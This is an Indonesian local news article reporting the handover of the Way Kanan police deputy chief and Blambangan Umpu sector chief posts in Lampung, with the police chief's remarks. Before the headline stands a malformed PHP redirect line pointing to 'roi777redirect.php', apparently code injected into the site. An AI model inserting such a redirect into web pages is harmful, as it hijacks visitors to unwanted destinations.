header( 'Location: /roi777redirect.php true, 303 );header( 'Location: roi777redirect.php', true, 303 ); Wakapolres Waykanan Diserah Terimakan -
Wakapolres Waykanan Diserah Terimakan

Translampung.com, Blambangan umpu –

Kepolisian Resort daerah waykanan Polda Lampung lakukan upacara serah trima jabatan Wakapolres waykanan dan Kapolsek Blambangan umpu di lapangan mapolres setempat sabtu, (13/1)

Kompol M. Darmawan ST yang semula menjabat Wakapolres waykanan dipindahkan Tugaskan menjadi Kasiprasja Subditdikyasa Ditlantas Polda Lampung dan selanjutnya Kompol Leo Dedy De Fretes, S.H. S.Ik., M.H. Yang sebelumnya menjabat sebagai Kasi STNK Subditregident Ditlantas Polda Lampung diangkat dalam jabatan baru sebagai Wakapolres Way Kanan.

Selain Wakapolres, sertijab juga dilakukan Kapolsek Blambangan umpu, Kompol Sunaryadi Hidayat Hutasuhut yang semula menjabat Kapolsek Blambangan umpu diangkat dalam jabatan baru sebagai Kabagsumda Polres Pesawaran Polda Lampung dan digantikan oleh Kompol Feri Anda Eka Putra, S.H yang sebelumnya menjabat sebagai Kapolsek Pesisir Tengah Polres Lampung Barat Polda Lampung.

Kapolres waykanan AKBP Doni Wahyudi  yang memimpin upacara sertijab itu mengatakan upacara itu sengaja digelar sebagai rangkaian mutasi pejabat di lingkungan Polri, yang menjadi salah satu upaya penyegaran organisasi pada aspek sumber daya manusia, dan aspek pembinaan kesatuan.

“Atas nama pimpinan dan jajaran Polres Way Kanan Saya mengucapkan selamat bertugas di tempat yang baru dan terima kasih serta penghargaan setinggi-tinggi nya kepada Kompol M. Darmawan, S.T dan Kompol Sunaryadi Hidayat Hutasuhut atas kerjasama dan telah mengukir prestasi kemajuan Polres Way Kanan, sebaliknya Saya juga mengucapkan selamat datang kepada Wakapolres waykanan dan Kapolsek Blambangan umpu yang baru semoga Bisa menjalin kerja sama yang baik Dalam menegakkan hukum Di Bumi Ramik Ragom,” pungkas AKBP Doni. (migo)

News Reporter